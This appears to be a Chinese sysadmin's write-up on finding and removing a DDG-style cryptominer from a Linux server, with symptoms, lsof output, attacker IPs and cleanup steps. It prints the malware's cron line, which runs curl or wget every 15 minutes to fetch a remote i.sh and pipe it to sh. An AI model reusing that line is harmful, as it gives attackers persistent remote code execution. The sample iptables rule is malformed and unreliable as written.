服务器被攻击后当作矿机，高WIO

__

矿机特点：

  

1. 操作系统反应慢。
2. wio 非常高，一般轻松达到50%，甚至达到100%。
3. 在/root/ 下存在 .ddg 隐藏路径。路径中有nnnn.db 二进制文件。
4. /tmp 、/usr/libexec 、/usr/bin 等一个或者多个路径中存在 新增可执行文件，如果存在多个，则名称上来看，无实际意义。文件大小几乎相同 ，通过diff命令，可执行文件无区别。
5. 存在连接至国外的网络。
6. 使用root 登录，并为root用户添加定时任务。一般为每15分钟连接外网下载名为 “i.sh”的文件并执行。

预防方法：

1. 网络：禁止外网访问，严格控制进出端口。
2. 服务器：禁止root直接远程登录，禁止Ping 服务器
3. 软件：软件不使用默认端口，很多黑客是通过软件的默认端口和漏洞进行攻击的。

    

下面是本次处理的过程。主要采用处理的方法是添加网络防火墙，禁止访问某个IP段 。下面是分析过程

---

主机CPU消耗过高

红框标注的内容，都是可疑进程。从名字上来看，是两类：vTtHH* 和ldrlfa* 。 先来看vTtHH* 这一类。

进程8907的父进程是1， 一般这种情况是由守护进程发起的。可是 守护进程没找到 。因为守护进程的名字有可能是经过伪装的。

而该文件存放于/tmp/路径中：

红框中的文件，是随机生成的文件，文件名不一定有规律，但是文件大小相近，内容相同：

这些文件都是编译过的二进制文件。是C/C++可执行文件。

没有进程在使用这些文件。

继续查看下ldrlfa* 这类命令。

可以看到分别于4月30日与5月11日，启动了两个命令：ldrlfa2 /ldrlfa3.这些命令存放于/usr/bin/.

发现这类文件会重复生成，生成的时间并没有什么规律 。

定时任务

*/15 * * * * (/usr/bin/ldrlfa3||/usr/libexec/ldrlfa3||/usr/local/bin/ldrlfa3||/tmp/ldrlfa3||curl -m180 -fsSL http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh

每15分钟，执行一次，调用/usr/bin, /usr/libexec, /usr/local/bin /tmp 路径下去查找

Ldrlfa3 命令, 并从104.128.230.16:8000 下载i.sh 文件并执行。

追踪进程

[root@~ tmp]# lsof -p 16265

COMMAND   PID USER   FD      TYPE    DEVICE SIZE/OFF      NODE NAME

ldrlfa2 16265 root  cwd       DIR     253,0    49152 805306441 /usr/bin

ldrlfa2 16265 root  rtd       DIR     253,0      275        64 /

ldrlfa2 16265 root  txt       REG     253,0  4446828 8262721626 /usr/bin/ldrlfa2

ldrlfa2 16265 root  mem-W     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    0r      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    1w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    2w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    3r      CHR       1,9      0t0      4792 /dev/urandom

ldrlfa2 16265 root    4u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root    5uW     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    6u     IPv6 231916470      0t0       TCP *:7946 (LISTEN)

ldrlfa2 16265 root    7u     IPv6 231916471      0t0       UDP *:7946

ldrlfa2 16265 root    8u     IPv4 260937900      0t0       TCP ~:19290->211.151.7.198:7946 (SYN_SENT)

ldrlfa2 16265 root    9r  a_inode       0,9        0      4783 inotify

ldrlfa2 16265 root   10u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   11r     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   12w     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   13u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   14r     FIFO       0,8      0t0 231916473 pipe

ldrlfa2 16265 root   15w     FIFO       0,8      0t0 231916473 pipe

[root@pmo02 tmp]# cd /root/.ddg/

[root@pmo02 .ddg]# ls

4000.db  4001.db  4002.db  4003.db

[root@~ .ddg]# ls -lrt

总用量 96

-rw------- 1 root root 32768 4月  30 15:26 4001.db

-rw------- 1 root root 32768 5月   4 19:48 4000.db

-rw------- 1 root root 32768 5月  16 17:25 4003.db

-rw------- 1 root root 32768 5月  16 17:29 4002.db

[root@~ .ddg]# cat 4001.db

ZCmd.Processed@<84\#\,\stBucket

;P_+R d(+˺z<?f0+qkwj"yHQGf0HqЎfзKo/

|H|˕bf*+8a+{w<1iky/&Df.k

z/!lAfHQh_O_qЎf_kw;Pv*4!G/

w;8ڀ}2Et5>sz֎<pyѵk

GrCfS

U7~
vux9w'!

R

从追踪进程来看，挖矿进程，会将本机的 19290端口转发至211.151.7.198:7946端口.

在/root 路径下自动创建了隐藏文件夹.ddg/ ，该路径下存放着 几个 nnnn.db ，而该文件是二进制文件。看不懂。 直接将.ddg 删除。

网络分析

检查当前主机上的网络连接，发现部分异常IP和端口（挖矿进程是需要与外网进行通信的）。从主机上查看：

94.130.49.186    --> 乌克兰

95.216.74.37      --> 乌克兰

182.92.12.11      --> 北京大兴，阿里云

5.79.108.34        --> 荷兰

104.128.230.16  --> 美国

从最终处理结果来看，这是一个正确的方向。

处理方法

将以上发现的定时任务、可执行文件内容全部删除 。

同时防火墙拒绝以上5个地址的全IP段，同时拒绝下载i.sh 文件的IP网络。

添加防火墙策略示例如下：

Iptables –I INPUT 94.0.0.0/8 –j DROP 

添加完成后，需要执行service iptables save 将策略保存。